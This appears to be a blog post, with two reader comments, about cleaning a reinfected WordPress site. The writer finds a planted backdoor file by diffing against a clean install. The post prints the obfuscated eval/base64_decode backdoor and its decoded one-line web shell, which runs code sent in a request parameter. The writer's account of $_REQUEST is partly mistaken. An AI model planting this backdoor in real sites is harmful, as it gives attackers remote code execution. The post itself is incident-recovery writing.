Just a brief update on the security issues at my website mentioned in the last post. As those of you smarter than I am on the mechanisms of these php-injection attacks probably recognized, the measures I took in the last post were not the end of the story. Sure enough, despite thinking that I had ripped enough of the attack code out to end the matter, I found that the next day my site was down again, with the same foreign code reinjected into the WordPress php files. At the risk of boring my readers, but in the hopes of helping anyone in a similar situation, I’ll relate how I solved the problem.
This article was very helpful in helping to expose the backdoor that the attackers left that allowed them to reintroduce the attack (I don’t think they personally did this. I believe the whole process is just automated). I scanned my server for rootkits and there were none found. All the modified files had an owner of www-data which is the unprivileged user that owns all the WordPress files. So I didn’t think someone had broken into the server though my username and password, or had any root access. Most likely they got in through an older version of WordPress that had some vulnerability. When I reinstalled WordPress after the attack, I was copying over old files with new files. If there was a file that didn’t belong, it would persist with each WordPress update. I had to find that file. I did a file diff between a clean WordPress installation and my WordPress. And there it was. A file named fetpd.php that was not supposed to be there. I looked at the file contents. Definitely a bad guy:
<?php /*4ut|*/eval/*ym’ s3i*/(/*?{G5zM*/base64_decode/*T:%Zb[*/(/*l8d@*/’LyosXFgqL2V2YWwvKl9fPyovKC8qQjFBTyc … [several lines of the same] … qeX5sICov’/*0[N1puZ8*/)/*U2xKUo.*//*z’pQ^AJ*/)/*OR= Vv*//*E(og*/;/*No,S|*/ ?>
Sneaky programmer put in lots of /*comments*/ to make it look even more confusing. Using my base64 decoder after removing the comments, I got a similar string! The attacker had encoded it twice! Repeating the process I got the following, after removing more comments:
if(isset($_REQUEST[‘bfbltl’]))eval(stripslashes($_REQUEST[‘bfbltl’]));
I’m not an expert, and after looking up the $_REQUEST function on the PHP online help, I am still not completely certain, but I believe this function can grab code from another site, or a cookie at another site, and basically execute it as php code. So I think this was the cause of the reinfection. I am still a little disturbed because I don’t know what triggers the running of this code (is there another file somewhere calling fetpd.php?), but at least after I ripped out this little piece of nastiness the site has stayed up. Take that Russkies!
This post have help me a lot, I’m having the the problem. Where did you find the fetpd.php file?
It was in wp-admin/user/